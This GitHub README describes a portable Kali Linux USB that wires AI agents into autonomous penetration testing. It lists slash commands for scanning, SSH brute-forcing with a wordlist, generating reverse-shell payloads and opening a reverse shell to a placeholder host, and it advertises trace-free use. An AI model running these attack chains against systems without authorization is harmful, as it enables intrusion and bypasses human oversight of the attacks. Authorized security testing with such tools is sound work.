Adarsh1Y/kali-opencode-usb
GitHub: Adarsh1Y/kali-opencode-usb
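A bootable Kali Linux USB with integrated AI-driven penetration testing tools. It supports offline operation, autonomous attack chains and automatic report generation, for portable, trace-free security assessments.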
# 🗡️ Kali + OpenCode Portable Pentest USB
A bootable USB drive that combines **Kali Linux Live** with **AI-driven penetration testing tools**: it includes OpenCode, CLI Agent, Kali MCP and Shannon Plugin for autonomous penetration testing.
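## 🔥 Why This Project Exists
Problems with the traditional pentest workflow:
| Problem | This solution |
|---------|---------------|
| Tools scattered across different machines | A single USB with everything preconfigured |
| Manual, repetitive reconnaissance workflows | AI tools automate the workflow |
| Forgetting to record findings | Automated documentation and reporting |
| Leaving traces on client systems | Boot a Live USB; the host disk is not touched |
| AI tools depend on APIs | CLI Agent + Ollama work offline |
| Steep learning curve for tools | Kali MCP + Shannon expose the tools through AI |
| Complex multi-stage attacks | Shannon handles autonomous penetration testing |
## 📦 What You Get
- **Full Kali Linux** - every pentest tool (nmap, metasploit, burp, hashcat, etc.)
- **OpenCode** - modern AI CLI with plugins, MCP and a web UI
- **CLI Agent** - lightweight AI agent with support for local Ollama models
- **Kali MCP** - 35+ security tools exposed as MCP tools
- **Shannon Plugin** - autonomous pentesting with 600+ Docker tools + browser automation
- **Persistence** - your configuration, workflows and findings survive reboots
- **Forensically Clean** - remove the USB and no trace is left on the host (runs in memory only)
## 🤖 AI Tool Suite
### OpenCode (Cloud + Local)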
```
opencode # Start TUI
opencode web # Start web interface
```
**Features:** TUI, web interface, MCP, plugins, multi-agent, GitHub integration
### CLI Agent (Local First)
```
agent chat # Cloud API
agent chat --model ollama:llama3 # Offline with Ollama
```
### Kali MCP (35+ Security Tools)
```
/port_scan target=192.168.1.1 scan_type=quick
/dns_enum domain=example.com
/hydra_attack target=10.0.0.1 service=ssh
```
### Shannon Plugin (Autonomous Pentesting)
```
/shannon-scan target=example.com # Full autonomous pentest
/shannon-recon target=example.com # Reconnaissance only
/shannon-report # Generate professional report
```
**Shannon tools:**
| Tool | Purpose |
|------|---------|
| `shannon_docker_init` | Start the Docker container |
| `shannon_recon` | Reconnaissance (nmap, subfinder, whatweb) |
| `shannon_vuln_discovery` | Vulnerability scanning |
| `shannon_browser` | Playwright browser testing |
| `shannon_exploit` | Exploitation (authorized) |
| `shannon_report` | Generate a professional report |
| `shannon_idor_test` | IDOR vulnerability testing |
| `shannon_upload_test` | File upload testing |
**Tools bundled with Shannon:** nmap, sqlmap, nikto, nuclei, gobuster, ffuf, hydra, hashcat, gowitness, BrowserBruter, Playwright
## 🚀 Quick Start
### Build the USB
```
git clone https://github.com/Adarsh1Y/kali-opencode-usb.git
cd kali-opencode-usb
sudo ./build-usb.sh /dev/sdX
# Wait 10-20 minutes (downloads the ~3GB Kali ISO)
```
### Boot
1. Insert the USB into the target machine
2. Boot from the USB (press F12/Del/Esc to enter the boot menu)
3. Select **"Live USB Persistence"**
4. Log in: `kali` / `kali`
### First-Boot Setup
```
sudo bash ~/opencode-setup.sh
```
This installs:
- OpenCode
- CLI Agent
- Kali MCP
- Ollama (optional)
## 📁 Repository Structure
```
kali-opencode-usb/
├── build-usb.sh                 # USB builder script
├── kali-mcp/                    # Kali MCP Server (35+ tools)
│   ├── kali_mcp_server/         # MCP tools implementation
│   ├── Dockerfile               # Docker container
│   └── README.md                # Kali MCP docs
├── opencode-shannon-plugin/     # Shannon Plugin (autonomous pentest)
│   ├── src/                     # Plugin source code
│   ├── Dockerfile               # Shannon Docker tools
│   └── README.md                # Shannon docs
├── cli-agent/                   # CLI Agent (from ~/cli-agent)
├── postinstall/
│   ├── opencode-setup.sh        # First-boot setup
│   └── README-OPENCODE.txt      # Quick reference
├── scripts/
│   ├── backup-config.sh
│   └── deploy-node.sh
└── docs/
    ├── USAGE.md
    └── SECURITY.md
```
## 🔧 MCP Configuration
OpenCode comes preconfigured with the MCP servers and the plugin:
```
// ~/.config/opencode/opencode.jsonc
{
  "mcp": {
    "cli-agent": {
      "type": "local",
      "command": ["~/cli-agent/.venv/bin/python", "~/cli-agent/mcp_server.py"],
      "enabled": true
    },
    "kali-mcp": {
      "type": "local",
      "command": ["~/kali-mcp/.venv/bin/python", "-m", "kali_mcp_server"],
      "enabled": true
    }
  },
  "plugin": [
    "~/opencode-shannon-plugin"
  ]
}
```
## 🛠️ Kali MCP Tools (35+)
### Network Tools
```
/port_scan target=192.168.1.1 scan_type=full
/network_discovery target=192.168.1.0/24 discovery_type=comprehensive
/dns_enum domain=example.com record_types=a,mx,ns,txt
/subdomain_enum url=https://example.com
```
### Web Applications
```
/web_enumeration target=http://example.com enumeration_type=full
/vulnerability_scan target=example.com scan_type=comprehensive
/spider_website url=https://example.com depth=3
/header_analysis url=https://example.com
/ssl_analysis url=https://example.com port=443
```
### Exploitation
```
/exploit_search search_term="apache 2.4" search_type=web
/payload_generate payload_type=reverse_shell platform=linux lhost=YOUR_IP lport=4444 format=elf
/reverse_shell lhost=YOUR_IP shell_type=bash lport=4444
```
### Credentials
```
/hydra_attack target=192.168.1.1 service=ssh username=admin passlist=/usr/share/wordlists/rockyou.txt
/hash_identify hash_value=5d41402abc4b2a76b9719d911017c592
/encode_decode data="hello" operation=encode format=base64
```
### Session Management
```
/session_create session_name="client-audit" description="Q1 audit" target=example.com
/session_list
/session_switch session_name="client-audit"
/session_status
```
### Reporting
```
/create_report title="Security Assessment" findings="..." report_type=markdown
/save_output content="..." filename="notes" category="general"
/file_analysis filepath=/path/to/file
```
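A pre-flight scope check for the slash commands above, as an added example that is not part of Kali MCP, OpenCode or this repository: it refuses any command whose `target`, `domain` or `url` falls outside the scope named in the written authorization. The scope values and the names `host_in_scope` and `check_command` are assumptions made for illustration.

```python
import ipaddress
import shlex
from urllib.parse import urlsplit

# Constructed scope (assumption): what the written authorization covers.
SCOPE_NETS = [ipaddress.ip_network("192.168.1.0/24")]
SCOPE_DOMAINS = ["example.com"]
# Parameter names that carry a target in the commands shown on this page.
TARGET_KEYS = ("target", "domain", "url")


def host_in_scope(host):
    """True if host (IP, CIDR or DNS name) lies inside the authorized scope."""
    try:
        net = ipaddress.ip_network(host, strict=False)
    except ValueError:
        name = host.rstrip(".").lower()
        # Exact match or true subdomain only; "notexample.com" must not match.
        return any(name == d or name.endswith("." + d) for d in SCOPE_DOMAINS)
    return any(net.version == s.version and net.subnet_of(s) for s in SCOPE_NETS)


def check_command(line):
    """Return (allowed, reason) for one slash command before it is dispatched."""
    try:
        parts = shlex.split(line)
    except ValueError:
        return False, "unparseable command"
    if not parts or not parts[0].startswith("/"):
        return False, "not a slash command"
    params = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
    targets = [params[k] for k in TARGET_KEYS if k in params]
    if not targets:
        return True, "no target parameter"  # e.g. /session_list
    for value in targets:
        try:
            # For URLs, judge the host actually contacted, not the raw string.
            host = urlsplit(value).hostname if "://" in value else value
        except ValueError:
            host = None
        if not host or not host_in_scope(host):
            return False, f"out of scope: {value}"  # fail closed
    return True, "in scope"


if __name__ == "__main__":
    for cmd in ("/port_scan target=192.168.1.1 scan_type=quick",
                "/hydra_attack target=10.0.0.1 service=ssh",
                "/spider_website url=https://example.com@10.0.0.1/ depth=3"):
        print(cmd, "->", check_command(cmd))
```

The check fails closed: a value that parses as neither an in-scope network nor an in-scope name is rejected, including URLs whose userinfo part imitates an in-scope host.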
## 🏗️ Architecture
```
┌─────────────────────────────────────────────────────────┐
│                        USB Drive                        │
├─────────────────────────────────────────────────────────┤
│  [EFI Boot]  - Kali bootloader                          │
│  [Live ISO]  - Read-only Kali base system               │
│  [Persist]   - /home/kali/                              │
│    ├── .opencode/          - OpenCode config            │
│    ├── .config/opencode/   - MCP + Plugin config        │
│    ├── cli-agent/          - CLI Agent                  │
│    ├── kali-mcp/           - Kali MCP Server            │
│    ├── opencode-shannon/   - Shannon Plugin             │
│    └── shannon-tools       - Docker image (600+ tools)  │
└─────────────────────────────────────────────────────────┘
                             │
                             │  Boot on any x64 machine
                             ▼
┌─────────────────────────────────────────────────────────┐
│                Your Portable Pentest Rig                │
│  • Full Kali toolset                                    │
│  • OpenCode (cloud AI + orchestration)                  │
│  • CLI Agent (offline AI with Ollama)                   │
│  • Kali MCP (35+ security tools)                        │
│  • Shannon (autonomous pentesting)                      │
│  • Nothing touches host disk                            │
└─────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────┐
│                        USB Drive                        │
├─────────────────────────────────────────────────────────┤
│  [EFI Boot]  - Kali bootloader                          │
│  [Live ISO]  - Read-only Kali base system               │
│  [Persist]   - /home/kali/                              │
│    ├── .opencode/          - OpenCode config            │
│    ├── .config/opencode/   - MCP servers config         │
│    ├── cli-agent/          - CLI Agent                  │
│    ├── kali-mcp/           - Kali MCP Server            │
│    └── .openclaw/          - Ollama models (optional)   │
└─────────────────────────────────────────────────────────┘
                             │
                             │  Boot on any x64 machine
                             ▼
┌─────────────────────────────────────────────────────────┐
│                Your Portable Pentest Rig                │
│  • Full Kali toolset                                    │
│  • OpenCode (cloud AI + orchestration)                  │
│  • CLI Agent (offline AI with Ollama)                   │
│  • Kali MCP (35+ security tools via AI)                 │
│  • Nothing touches host disk                            │
└─────────────────────────────────────────────────────────┘
```
---
## 🔐 Security Considerations
> ⚠️ **Only test systems you have written authorization to test.**
- Encrypt persistence partition for sensitive engagements
- Never leave USB unattended
- Use VPN for remote connections
- Document all authorization in memory files
---
## 🙏 Acknowledgements
Built with:
- **[Kali Linux](https://kali.org)** - Penetration testing distribution
- **[OpenCode](https://opencode.ai)** - Modern AI CLI
- **[CLI Agent](https://github.com/amranu/cli-agent)** - MCP-enabled AI assistant
- **[Kali MCP](https://github.com/k3nn3dy-ai/kali-mcp)** - 35+ security tools via MCP
- **[Shannon Plugin](https://github.com/vichhka-git/opencode-shannon-plugin)** - Autonomous pentesting
- **[Ollama](https://ollama.com)** - Local AI runtime
---
## 📬 Contact
- **GitHub:** [@Adarsh1Y](https://github.com/Adarsh1Y)
- **Discord:** [OpenCode Community](https://discord.gg/opencode)
---
> **Disclaimer:** This tool is for authorized security testing only.